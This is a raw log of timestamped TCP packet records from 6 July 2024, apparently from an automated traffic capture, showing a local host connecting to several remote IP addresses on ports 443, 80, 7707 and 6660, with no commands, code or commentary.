                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.212588072 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.213157892 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.213217020 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.213306904 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.213356972 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.213366985 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.213404894 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290244102 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290303946 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290400028 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290446997 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290455103 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290493011 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.290997982 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.291044950 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.301775932 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.301826954 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.301835060 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.301875114 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.370721102 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.370784044 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.370876074 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.370923996 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.371058941 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.371105909 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.371207952 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.371251106 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.371321917 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.371365070 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.448074102 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.448127031 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.448350906 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.448405027 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.448734045 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.448785067 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.449242115 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.449282885 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.460067034 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.460119963 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.460129023 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.460161924 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526119947 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526171923 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526242971 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526289940 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526437998 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526477098 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526758909 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.526809931 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.527256966 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.527287006 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.527302980 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.527312040 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.527322054 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.527344942 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606461048 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606499910 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606590986 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606590986 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606601000 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606636047 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606671095 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606678009 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606690884 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606761932 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606790066 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.606899977 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.607490063 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.607615948 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.684709072 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.684809923 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.684818983 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.684828997 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.684931993 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.685087919 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.685245991 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.685477018 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.685484886 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.685734034 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763022900 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763144970 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763510942 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763545990 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763597965 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763597965 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763611078 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763665915 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763734102 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.763811111 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.781116009 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.781119108 CEST498247707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.786150932 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.786164045 CEST77074982494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.786216974 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.786267996 CEST498247707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.787091017 CEST498247707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.791244984 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.791917086 CEST77074982494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.840396881 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.840492010 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.840588093 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.840776920 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.875502110 CEST8049823188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.876952887 CEST8049823188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.877159119 CEST4982380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.882327080 CEST4982380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.987668037 CEST4982580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.992808104 CEST8049825188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.993063927 CEST4982580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.993180990 CEST4982580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:08.997944117 CEST8049825188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.000973940 CEST4982580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.005779982 CEST8049825188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.299187899 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.299236059 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.299314976 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.301944017 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.301954985 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.445327997 CEST77074982494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.446069002 CEST498247707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.450823069 CEST77074982494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.660439014 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.660507917 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.737946033 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.738006115 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.738022089 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.738050938 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.738070011 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.738100052 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.745656967 CEST49822443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.745672941 CEST44349822188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.760289907 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.760351896 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.761960983 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.761970997 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.762177944 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.763505936 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.773951054 CEST8049825188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.774266958 CEST8049825188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.774310112 CEST4982580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.777561903 CEST4982580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.804502964 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.875570059 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.875627995 CEST44349826104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.875674009 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.876372099 CEST49826443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.886884928 CEST4982780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.891956091 CEST8049827208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.892033100 CEST4982780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.892272949 CEST4982780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.893981934 CEST4982880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.897027969 CEST8049827208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.898806095 CEST8049828188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.898864985 CEST4982880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.898941994 CEST4982880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.903914928 CEST8049828188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.903961897 CEST4982880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:09.908972025 CEST8049828188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.367538929 CEST8049827208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.440032005 CEST4982780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.625601053 CEST8049828188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.625763893 CEST8049828188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.626053095 CEST4982880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.629182100 CEST4982880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.737682104 CEST4982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.742667913 CEST8049829188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.743030071 CEST4982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.743030071 CEST4982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.747891903 CEST8049829188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.748076916 CEST4982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.752897024 CEST8049829188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.786719084 CEST4982780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.789886951 CEST4983080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.792716026 CEST8049827208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.794294119 CEST4982780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.795784950 CEST8049830208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.796062946 CEST4983080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.796139002 CEST4983080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:10.801809072 CEST8049830208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.296493053 CEST8049830208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.440112114 CEST4983080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.450417042 CEST8049829188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.450964928 CEST8049829188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.451066971 CEST4982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.454190016 CEST4982980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.455980062 CEST498196660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.456347942 CEST498316660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.460777998 CEST66604981994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.461100101 CEST66604983194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.461180925 CEST498316660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.461898088 CEST498316660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.466670036 CEST66604983194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.555397034 CEST4983080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.560868979 CEST8049830208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.560981035 CEST4983080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.565696001 CEST49832443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.565741062 CEST44349832104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.565905094 CEST49832443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.566071987 CEST49832443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.566091061 CEST44349832104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.601769924 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.608568907 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.609055996 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.609117985 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.615413904 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.615459919 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.622967005 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.759454966 CEST498247707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.765054941 CEST77074982494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:11.765103102 CEST498247707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.020966053 CEST44349832104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.022594929 CEST49832443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.022619963 CEST44349832104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.164689064 CEST44349832104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.164745092 CEST44349832104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.164786100 CEST49832443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.165154934 CEST49832443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.166013002 CEST4983480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.170829058 CEST8049834208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.170902967 CEST4983480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.170983076 CEST4983480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:12.175796032 CEST8049834208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.397460938 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.397578001 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.397691965 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.397696018 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.397757053 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398053885 CEST8049834208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398216963 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398552895 CEST8049834208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398600101 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398642063 CEST8049834208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398658991 CEST66604983194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398680925 CEST4983480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398706913 CEST498316660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398710966 CEST4983480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398879051 CEST8049833188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398890018 CEST66604983194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398915052 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.398936987 CEST498316660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.401133060 CEST4983380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.503103971 CEST4983580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.509387970 CEST8049835188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.509479046 CEST4983580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.509566069 CEST4983580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.515924931 CEST8049835188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.515986919 CEST4983580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.520800114 CEST8049835188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.609859943 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.614725113 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.614773989 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:13.619570971 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.022191048 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.080833912 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.080914974 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.193306923 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.198189974 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.198246956 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.203021049 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.207711935 CEST8049835188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.209407091 CEST8049835188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.209455967 CEST4983580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.211452007 CEST4983580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.315669060 CEST4983680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.320545912 CEST8049836188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.320626020 CEST4983680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.320671082 CEST4983680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.325500011 CEST8049836188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.325546026 CEST4983680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.331089020 CEST8049836188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.371925116 CEST4983480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.376956940 CEST8049834208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.377010107 CEST4983480192.168.2.4208.95.112.1
